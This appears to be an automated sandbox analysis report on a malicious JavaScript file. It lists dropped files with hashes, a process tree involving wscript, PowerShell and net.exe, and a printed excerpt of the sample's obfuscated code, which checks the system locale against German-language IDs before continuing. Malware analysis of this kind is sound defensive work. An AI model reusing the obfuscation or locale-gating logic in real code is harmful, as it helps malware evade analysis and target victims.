Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.671282170534205 |
Encrypted: | false |
SSDEEP: | 24:Yv6XNXIzvjD5amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSX:YvQXQbDFBgkDMUJUAh8cvMX |
MD5: | 964D42E94D0F0570D7D5B3F1C84D506B |
SHA1: | 715163F83D25BCBFC429D2BB34173A73354932A6 |
SHA-256: | 258EC8B3CFD738B0E7489D8ECDC1F2AC700EB3B65E27EB1AE1B1788C5ED7B233 |
SHA-512: | DF73C6ACDEDB630E5297232FD7B4D7B1E16D3DD5F048571D181DD9CE902C41D11757FA6CDF2052EBE60E9624A79FAED9C948E6DE516DA24CA2CEE326FA2C0F36 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.294961779488964 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX2yRBGULVlZVoZcg1vRcR0Yic8DoAvJfshHHrPeUkwRe9:YvXKX2yzDLbIZc0vjDsGUUUkee9 |
MD5: | EB5DEC8F031A4A9C7584BFA22D1313FD |
SHA1: | CF090F6D685DEA0A6CA87CF742320E29CD02374D |
SHA-256: | D64D4C21C673A2BEEAC853D37E8155A5ED0D4E3C7E96680AE5AD7D3107D1A1C6 |
SHA-512: | 3B452BC1556B0CCF67D83B80D3FF22C2FB70D70372CBBD2E9953DD8A5A376A5C07910DEA0F15414E516BF7F682A9DC6246DEB784A346C746B38144FE9B356DB0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.30526504225329 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX2yRBGULVlZVoZcg1vRcR0Yic8DoAvJTqgFCrPeUkwRe9:YvXKX2yzDLbIZc0vjDsGTq16Ukee9 |
MD5: | 663750238F13C1F7880A61B11BB278A8 |
SHA1: | 9150A32FBF2B33CB4C2F7D0DDCB2B82506BF4A8B |
SHA-256: | 0C68D0E85283091E357D9D5429A607C516E6636D13A0AF0535890BBA6B9BC5B9 |
SHA-512: | C5E8E1149E9994FAC4853498673F92F5F025EA655329016755E3EA42BC64C5504458E8AACEB974A160D231BC413287AAE6CCC0EDE6405FE84E3C61ED9342A9B0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.141149442089295 |
Encrypted: | false |
SSDEEP: | 24:Ylpwra3Bay6NvYeHP1foB/xKTZ8djr5Mj0SLaAY2TLKpV2LSuC1Vb08kI7sX5PnK:YjWgev1foRGcrISd5oQbJ6hAh9CdZY |
MD5: | A97CAA6DCEC5D23BC131AB56D10A0101 |
SHA1: | C9CA96D465B1575419646FD14FF71A6B74B27027 |
SHA-256: | CFB14CDF8F5794741354974BC0611F14FACDD484E1E99E5BDC45A598783E6139 |
SHA-512: | 3868805D9D89C1249C303A4C6A04713838A95286CAF4CCA454474FF099E7073FC713FC9E1DBE4BF5A3B16C105468CAA77D4C704D21BE53172DE85AEF6AD31CF3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.188079054540981 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msEHUUUUUUUU/SvR9H9vxFGiDIAEkGVvpz:lNVmswUUUUUUUU/+FGSItf |
MD5: | BE73BEB28739C0E7B71EDB7EE8089B6B |
SHA1: | 3045D08A476F24E5039619D27E277B8BE452E2DD |
SHA-256: | 253AFD0BD8F34AC59301A7F0DE65CFDE9C2AA2D91C30D07130EE7316E3C26C65 |
SHA-512: | A00D44296E20A81DDE2C0869ADDD5E6FFF7252CEAF2CF783B05CF2C69D84265F309F5A0CE4CD4BC80C2E3799F2EE2320AE80A23EC2F5CDB17CB770450666DCCB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.607809918234135 |
Encrypted: | false |
SSDEEP: | 48:7MOKUUUUUUUUUUDvR9H9vxFGiDIAEkGVv2qFl2GL7msz:7mUUUUUUUUUUTFGSIt8KVmsz |
MD5: | B7B7ED0717346C64ECA36D13ACAB8F14 |
SHA1: | F29F580A233B4671DC6A066C4112327B4C9C3475 |
SHA-256: | 7BD61CFEC44B145A9F09EEA68A307FDAAB4235BDEEF3B30C0CD2CDA5CA065C31 |
SHA-512: | 10A3B23DC3114B2095206CC92704983A50DE5851875A417A6C1516EC53492FC515BE8240745757C3C350D9D3E1609748C13BF0C2D570A2E9663EAD0A680C9CBD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgBEYHh0l/Ty9GVc2hdWER1p2F1ZYyu:6a6TZ44ADE6YHh0l2oV1ou/oK |
MD5: | 08F7B5A727E3CCE7B0C4EB3B14A5B57E |
SHA1: | 02E9D7F5B5DE9C6617A9C38C4239536DE34D097E |
SHA-256: | 2F1BD6B1B14760BFE3F8C5D182A2A39AF3FCD7DAC0436BDD675ACD24A594F2C6 |
SHA-512: | ABF433EB20370B854372CC106CC6CEBA5FABFDDAE4B4ABBE7726D2CE12685B73BE837A316E6C3B991A91913DB03B8DAC3A5659900820278468EC86E8B867D23B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulVsHh:NllUGH |
MD5: | E396A80CD8E90276EF876FC94B5CFF7A |
SHA1: | 6A7ED0E4173A27630A7FC30F3C325EF9D031D495 |
SHA-256: | 8B604E9275EE1B6552C36CB85EAE692225A510A26942C4AC17C68046DE9F1516 |
SHA-512: | 1CD3AD1E23744327701BF26DBAECCCA8FF426D40FACDA77F067C3A56111E9E3A48DA3EF4B990476253C73F0B08E8C4F49375422A80216BD7DD2C57995AF4AFE4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5046637269111454 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClM:Qw946cPbiOxDlbYnuRK+bx |
MD5: | 9C5A2939FAAFD514180135FD1C5AAFA3 |
SHA1: | D1DD38A5FF4CF1429756BE31E6364FF99E299B1B |
SHA-256: | 1F1AD6127605B5A7B294B0A4A2CD03B500A8E56EA1135969468391B80F6003B5 |
SHA-512: | DB7763B11AE3B087E89F8B163D792BF9B6EEB7E5BB3F9A40BC136B0CCE903DBEB6D38E49F5F87DF0FA56087FDC091A2433063FFC4C1C4C7E24DCBD639396F4FA |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 20-23-01-757.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.345946398610936 |
Encrypted: | false |
SSDEEP: | 384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW |
MD5: | 8947C10F5AB6CFFFAE64BCA79B5A0BE3 |
SHA1: | 70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778 |
SHA-256: | 4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485 |
SHA-512: | B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15112 |
Entropy (8bit): | 5.340907723748943 |
Encrypted: | false |
SSDEEP: | 384:ntvQndapk9A9WvDqQy1cAodFOWDkCnH1wH3pLDZKQ5bC4BzwwfpN7c7mv1/bVXPJ:BMu |
MD5: | E1C50E1340FA8500234B6C56163BC0AF |
SHA1: | 5BE64501D6ED9B9A78E74ACD4C08944784C2A057 |
SHA-256: | BC667B899A362036B09215D584CCC4C87A8446528E8C05F53F6ECE452F5C3BAB |
SHA-512: | 7A7B01A79229986CC3148A3E1F5DFDD6C6281BEE9E614FB1D35A5B0DCA9F460164697AF877BE38E80C650528FB4805820D1C5025DFA3B09732EC10ADCB423CD0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.382940773213161 |
Encrypted: | false |
SSDEEP: | 768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rp:5EO |
MD5: | BFAE9CC58076420852FD2AFD103D7EF6 |
SHA1: | B23CA195AD10670847D8865770F346F069553472 |
SHA-256: | 47489249971B4DF6A98E04EDC271A132ABC59DD8548AFD3D2D86B64F1405F2B1 |
SHA-512: | E0E6B088248933E38C6DDCE2B4777018A7F8CCA76EA83D0F74B94F3595E3BFBD0FBBAC4E0FE0EAF927E7C9F9B661BE7438D9B33B133E7F7317FEFCE5D2E5C534 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xVwYIGNPoeWL07oYGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwZG7WLxYGZN3mlind9i4ufFXpAXkru |
MD5: | 595D52F056D9D1FF19D516F23C677369 |
SHA1: | 463739610C6108B2A704D1483FB4CBC88C026D47 |
SHA-256: | 05CC4FC8F7F02ECBC2C67933B998CC5A281DBD2CA4205460731AFDBAE42BF72A |
SHA-512: | DB58A87B6BB916D9E7CD63248F2FD8B6F3131974C8DB8ED9D3B86A74EA060602A58B9743BFF5763785F5BCC4C6E1A11AF80B7144264AD178B553232C42A55040 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje |
MD5: | 716C2C392DCD15C95BBD760EEBABFCD0 |
SHA1: | 4B4CE9C6AED6A7F809236B2DAFA9987CA886E603 |
SHA-256: | DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8 |
SHA-512: | E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.920444967841596 |
TrID: | |
File name: | 18731127942186526806.js |
File size: | 20'295 bytes |
MD5: | 1dabe4e3f8208c34dfa693bece372403 |
SHA1: | 09b929eff50fa3836cc3b6b981d82dc33d28b0c2 |
SHA256: | 10bc13bcedad36c6b94d7819f120e96263fa1629bc217d1491596d561b23857e |
SHA512: | b1ee10856e5026835edb1da9917fe08ab20e7f8c6172810fb83141a814fc68da46b7f59a1b66ecc3008d198f6e08bc603d640dfa784f2519cfdcb01619d004a1 |
SSDEEP: | 384:u28IeZcXcXKcXcX5FMQgEEEWn/+Fk0E427sDL:/8IMcXcXKcXcX3O/027sDL |
TLSH: | B19297448C80ED1359FC55B423CB18FA48EC834DC1578ACAD482BA56DB6D7721EE7A3B |
File Content Preview: | function awvba(){rutrctkai=[1031,3079,5127,4103,2055,3072];var ltacqpri=this[dyckvqhvz+gtzifjsel+fptixpxp+pafdzca+bvyslhj+ehnftbn+nisefdsn+xvdhf](this[flxjg+bmkfkwltl+waiww+fptixpxp+igiyc+dyckvqhvz+xvdhf][bbxmt+fptixpxp+bvyslhj+gtzifjsel+xvdhf+bvyslhj+dke |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 20:22:50 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7af990000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 20:22:50 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff78e2d0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 20:22:50 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 20:22:50 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 20:22:58 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6bc1b0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 5 |
Start time: | 20:22:58 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff78e2d0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 20:22:58 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff716570000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 20:22:58 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 8 |
Start time: | 20:22:59 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6eef20000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 20:22:59 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function awvba() { |
|
1 | rutrctkai = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var ltacqpri = this[dyckvqhvz + gtzifjsel + fptixpxp + pafdzca + bvyslhj + ehnftbn + nisefdsn + xvdhf] ( this[flxjg + bmkfkwltl + waiww + fptixpxp + igiyc + dyckvqhvz + xvdhf][bbxmt + fptixpxp + bvyslhj + gtzifjsel + xvdhf + bvyslhj + dkegvr + nolkum + wuqcbxf + bvyslhj + waiww + xvdhf] ( flxjg + bmkfkwltl + waiww + fptixpxp + igiyc + dyckvqhvz + xvdhf + ujcyadlz + bmkfkwltl + eubiuckli + bvyslhj + xfdcj + xfdcj ) [tgkrxpvbf + bvyslhj + qhttb + tgkrxpvbf + bvyslhj + gtzifjsel + nhgpocbo] ( drwvoeoz + ffnvou + xaexfbicp + pjchqjkc + ifbzhqqy + bbxmt + hxhlpugo + tgkrxpvbf + tgkrxpvbf + xaexfbicp + hpyrji + nvamywbyw + ifbzhqqy + hxhlpugo + bmkfkwltl + xaexfbicp + tgkrxpvbf + bdnuqc + bbxmt + zdufnec + nisefdsn + xvdhf + fptixpxp + zdufnec + xfdcj + gcerctirr + wzvmoukut + gtzifjsel + nisefdsn + bvyslhj + xfdcj + bdnuqc + ehnftbn + nisefdsn + xvdhf + bvyslhj + fptixpxp + nisefdsn + gtzifjsel + xvdhf + igiyc + zdufnec + nisefdsn + gtzifjsel + xfdcj + bdnuqc + nyysvsr + zdufnec + waiww + gtzifjsel + xfdcj + bvyslhj ), 16 ); |
|
3 | for ( rmhmz = 0 ; rmhmz < rutrctkai[xfdcj + bvyslhj + nisefdsn + qhttb + xvdhf + eubiuckli] ; ++ rmhmz ) | |
4 | { | |
5 | if ( ltacqpri == rutrctkai[rmhmz] ) | |
6 | { | |
7 | ltacqpri = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( ltacqpri !== true ) | |
12 | this[flxjg + bmkfkwltl + waiww + fptixpxp + igiyc + dyckvqhvz + xvdhf][aecygc + afbtubr + igiyc + xvdhf] ( ); | |
